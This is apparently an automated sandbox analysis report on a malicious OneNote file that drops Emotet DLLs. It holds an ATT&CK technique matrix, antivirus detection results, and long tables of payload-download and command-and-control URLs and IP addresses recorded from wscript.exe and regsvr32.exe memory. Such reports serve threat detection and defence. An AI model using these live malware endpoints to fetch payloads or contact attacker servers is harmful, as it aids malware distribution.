Source: Yara match	File source: C:\Users\user\Desktop\Insight_Medical_Publishing_4.one, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scripting	2 Registry Run Keys / Startup Folder	111 Process Injection	21 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	2 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	111 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Scripting	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Hidden Files and Directories	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	114 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Obfuscated Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Regsvr32	DCSync	25 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Insight_Medical_Publishing_4.one	33%	ReversingLabs	Win32.Trojan.OneNote
Insight_Medical_Publishing_4.one	41%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\rad16F69.tmp.dll	58%	ReversingLabs	Win64.Trojan.Emotet
C:\Windows\System32\BqnZyHskpeTuo\PjkJxfQvhUP.dll (copy)	58%	ReversingLabs	Win64.Trojan.Emotet

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
13.2.regsvr32.exe.1010000.0.unpack	100%	Avira	HEUR/AGEN.1215476		Download File
12.2.regsvr32.exe.590000.0.unpack	100%	Avira	HEUR/AGEN.1215476		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://182.162.143.56/	0%	URL Reputation	safe
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/i	100%	Avira URL Cloud	malware
https://www.gomespontes.com.br/logs/pd/windic2	100%	Avira URL Cloud	malware
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/w11798	100%	Avira URL Cloud	malware
https://66.228.32.31:7080/f	100%	Avira URL Cloud	malware
https://104.168.155.143:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/	100%	Avira URL Cloud	malware
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/s	100%	Avira URL Cloud	malware
https://penshorn.org/V	0%	Avira URL Cloud	safe
https://penshorn.org/admin/Ses8712iGR8	100%	Avira URL Cloud	malware
https://159.89.202.34/wviitvvypaw/exnwmeb/fqgitydelxiavmv/	100%	Avira URL Cloud	malware
http://wrappixels.com/wp-	0%	Avira URL Cloud	safe
http://ozmeydan.com/cekici/9/jn7	100%	Avira URL Cloud	malware
https://159.65.88.10:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv//	100%	Avira URL Cloud	malware
https://159.65.88.10:8080/xJ	100%	Avira URL Cloud	malware
https://91.121.146.47:8080/Y	100%	Avira URL Cloud	malware
https://104.168.155.143:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/A4	100%	Avira URL Cloud	malware
http://wrappixels.com	0%	Avira URL Cloud	safe
https://159.65.88.10:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/=	100%	Avira URL Cloud	malware
https://66.228.32.31:7080/	100%	Avira URL Cloud	malware
https://www.gomespontes.com.br/logs/pd/vM	100%	Avira URL Cloud	malware
http://softwareulike.com/cWIYxWMPkK/	100%	Avira URL Cloud	malware
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/	100%	Avira URL Cloud	malware
https://169.65.88.10:8080/	0%	Avira URL Cloud	safe
https://penshorn.org/admin/Ses8712iGR8du/ocal	100%	Avira URL Cloud	malware
http://ozmeydan.com/cekici/9/	100%	Avira URL Cloud	malware
https://penshorn.org/	0%	Avira URL Cloud	safe
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM	100%	Avira URL Cloud	malware
https://penshorn.org/admin/Ses8712iGR8du/tM	100%	Avira URL Cloud	malware
https://www.gomespontes.com.br/logs/pd/	100%	Avira URL Cloud	malware
https://159.89.202.34/cH	100%	Avira URL Cloud	malware
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM	100%	Avira URL Cloud	malware
https://91.121.146.47:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/	100%	Avira URL Cloud	malware
https://159.65.88.10:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/%4	100%	Avira URL Cloud	malware
https://159.65.88.10:8080/	100%	Avira URL Cloud	malware
https://penshorn.org/admin/Ses8712iGR8du/	100%	Avira URL Cloud	malware
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0	100%	Avira URL Cloud	malware
https://159.65.88.10:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/	100%	Avira URL Cloud	malware
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/	100%	Avira URL Cloud	malware
https://159.65.88.10:8080/hJ	100%	Avira URL Cloud	malware
https://91.121.146.47:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/=	100%	Avira URL Cloud	malware
https://penshorn.org/admin/Ses8712iGR8du/R	100%	Avira URL Cloud	malware
https://100.16.142.56:8080/	0%	Avira URL Cloud	safe
http://softwareulike.com/cWIYxWMPkK/yM	100%	Avira URL Cloud	malware
https://182.162.143.56/wviitvvypaw/exnwmeb/fqgitydelxiavmv/	100%	Avira URL Cloud	malware
https://160.16.142.56:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/	0%	Avira URL Cloud	safe
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/j2	100%	Avira URL Cloud	malware
https://163.44.196.120:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/H	100%	Avira URL Cloud	malware
http://ozmeydan.com/cekici/9/xM	100%	Avira URL Cloud	malware
https://163.44.196.120:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/	100%	Avira URL Cloud	malware
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM	100%	Avira URL Cloud	malware
http://ozmeydan.com/cekici	0%	Avira URL Cloud	safe
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/	100%	Avira URL Cloud	malware
https://160.16.142.56:8080/	0%	Avira URL Cloud	safe
https://penshorn.org/admin/Ses8712iGR8du/o	100%	Avira URL Cloud	malware
https://159.65.88.10:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/Xa4	100%	Avira URL Cloud	malware
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/temobj	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
penshorn.org	203.26.41.131	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://penshorn.org/admin/Ses8712iGR8du/	true	Avira URL Cloud: malware	unknown
https://182.162.143.56/wviitvvypaw/exnwmeb/fqgitydelxiavmv/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://softwareulike.com/cWIYxWMPkK/	wscript.exe, wscript.exe, 0000000A.00000003.344517254.000000000571B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329234815.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330874377.0000000003109000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338612910.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.353199405.00000000058CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349921274.00000000058C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354171415.00000000054D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338364395.000000000557B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333126963.0000000005483000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338711188.0000000005646000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340959551.0000000005747000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329158898.000000000310E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333630424.00000000054AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337986785.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334232531.0000000005535000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340425681.000000000561C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.350893818.000000000591E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349970561.0000000005899000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.331782249.00000000053E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340425681.0000000005685000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/i	wscript.exe, 0000000A.00000003.349340106.000000000587E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://182.162.143.56/	regsvr32.exe, 0000000D.00000003.434013590.0000000001114000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/s	wscript.exe, 0000000A.00000003.349970561.0000000005899000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.350018876.00000000058A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349899661.000000000588F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.gomespontes.com.br/logs/pd/windic2	wscript.exe, 0000000A.00000002.353779744.0000000003060000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/w11798	wscript.exe, 0000000A.00000003.353391125.0000000003093000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.353921759.0000000003094000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://66.228.32.31:7080/f	regsvr32.exe, 0000000D.00000003.434013590.0000000001114000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://104.168.155.143:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/	regsvr32.exe, 0000000D.00000002.573121126.000000000315C000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/	wscript.exe, wscript.exe, 0000000A.00000003.344517254.000000000571B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329234815.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330874377.0000000003109000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338612910.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.353199405.00000000058CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349921274.00000000058C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354171415.00000000054D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338364395.000000000557B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333126963.0000000005483000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338711188.0000000005646000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340959551.0000000005747000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329158898.000000000310E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333630424.00000000054AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337986785.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354280215.0000000005862000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334232531.0000000005535000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340425681.000000000561C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.350893818.000000000591E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349970561.0000000005899000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.331782249.00000000053E2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://159.89.202.34/wviitvvypaw/exnwmeb/fqgitydelxiavmv/	regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.573121126.000000000315C000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://penshorn.org/admin/Ses8712iGR8	wscript.exe, 0000000A.00000003.353412277.000000000574F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://penshorn.org/V	wscript.exe, 0000000A.00000002.354455582.0000000005947000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.351226281.0000000005947000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329298977.0000000005947000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://159.65.88.10:8080/xJ	regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://66.228.32.31:7080/	regsvr32.exe, 0000000D.00000003.434013590.0000000001114000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.gomespontes.com.br/logs/pd/vM	wscript.exe, 0000000A.00000003.350604005.0000000005120000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://wrappixels.com/wp-	wscript.exe, 0000000A.00000003.338584714.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.352714501.0000000005568000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://159.65.88.10:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv//	regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ozmeydan.com/cekici/9/jn7	wscript.exe, 0000000A.00000002.353883825.000000000307D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.353398614.000000000307C000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://104.168.155.143:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/A4	regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://91.121.146.47:8080/Y	regsvr32.exe, 0000000D.00000002.572082302.000000000107B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://wrappixels.com	wscript.exe, 0000000A.00000003.332245855.0000000003119000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330874377.0000000003119000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://169.65.88.10:8080/	regsvr32.exe, 0000000D.00000002.572469448.00000000010CC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://penshorn.org/admin/Ses8712iGR8du/ocal	wscript.exe, 0000000A.00000003.337986785.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334135815.0000000005548000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338584714.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.352714501.0000000005568000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333720815.000000000552F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337774489.000000000555B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337632623.0000000005554000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://159.65.88.10:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/=	regsvr32.exe, 0000000D.00000002.572469448.00000000010F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ozmeydan.com/cekici/9/	wscript.exe, wscript.exe, 0000000A.00000003.344517254.000000000571B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329234815.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330874377.0000000003109000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338612910.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.353199405.00000000058CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349921274.00000000058C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354171415.00000000054D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338364395.000000000557B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333126963.0000000005483000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338711188.0000000005646000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340959551.0000000005747000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329158898.000000000310E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333630424.00000000054AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337986785.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334232531.0000000005535000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340425681.000000000561C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.350893818.000000000591E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349970561.0000000005899000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.331782249.00000000053E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340425681.0000000005685000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://penshorn.org/	wscript.exe, 0000000A.00000003.351377227.0000000005931000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329298977.000000000591F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354439210.0000000005932000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.350893818.0000000005928000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM	wscript.exe, 0000000A.00000003.350604005.0000000005120000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.gomespontes.com.br/logs/pd/	wscript.exe, wscript.exe, 0000000A.00000003.344517254.000000000571B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329234815.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330874377.0000000003109000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338612910.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.353199405.00000000058CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349921274.00000000058C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354171415.00000000054D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338364395.000000000557B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333126963.0000000005483000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338711188.0000000005646000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340959551.0000000005747000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329158898.000000000310E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333630424.00000000054AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337986785.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354280215.0000000005862000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334232531.0000000005535000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340425681.000000000561C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.350893818.000000000591E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349970561.0000000005899000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.331782249.00000000053E2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://159.65.88.10:8080/	regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://penshorn.org/admin/Ses8712iGR8du/tM	wscript.exe, 0000000A.00000003.350604005.0000000005120000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://91.121.146.47:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/	regsvr32.exe, 0000000D.00000002.572082302.000000000107B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://159.89.202.34/cH	regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0	wscript.exe, 0000000A.00000003.350604005.000000000511B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM	wscript.exe, 0000000A.00000003.350604005.0000000005120000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://159.65.88.10:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/%4	regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://159.65.88.10:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/	regsvr32.exe, 0000000D.00000002.573121126.000000000315C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://159.65.88.10:8080/hJ	regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/	wscript.exe, wscript.exe, 0000000A.00000003.344517254.000000000571B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329234815.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.330874377.0000000003109000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338612910.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.353199405.00000000058CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349921274.00000000058C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.354171415.00000000054D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338364395.000000000557B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333126963.0000000005483000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.338711188.0000000005646000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340959551.0000000005747000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.329158898.000000000310E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333630424.00000000054AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.337986785.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334232531.0000000005535000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340425681.000000000561C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.350893818.000000000591E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349970561.0000000005899000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.331782249.00000000053E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.340425681.0000000005685000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://91.121.146.47:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/=	regsvr32.exe, 0000000D.00000003.410626582.00000000010F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://100.16.142.56:8080/	regsvr32.exe, 0000000D.00000002.572469448.00000000010C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://softwareulike.com/cWIYxWMPkK/yM	wscript.exe, 0000000A.00000003.350604005.0000000005120000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://penshorn.org/admin/Ses8712iGR8du/R	wscript.exe, 0000000A.00000002.354161417.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.333487031.00000000054C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.332982152.00000000054C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.334262935.00000000054CC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/j2	wscript.exe, 0000000A.00000003.346976631.000000000584E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.349194761.000000000586D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://160.16.142.56:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/	regsvr32.exe, 0000000D.00000002.572469448.000000000115C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.572469448.0000000001114000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://163.44.196.120:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/H	regsvr32.exe, 0000000D.00000002.573121126.000000000315C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ozmeydan.com/cekici/9/xM	wscript.exe, 0000000A.00000003.350604005.0000000005120000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
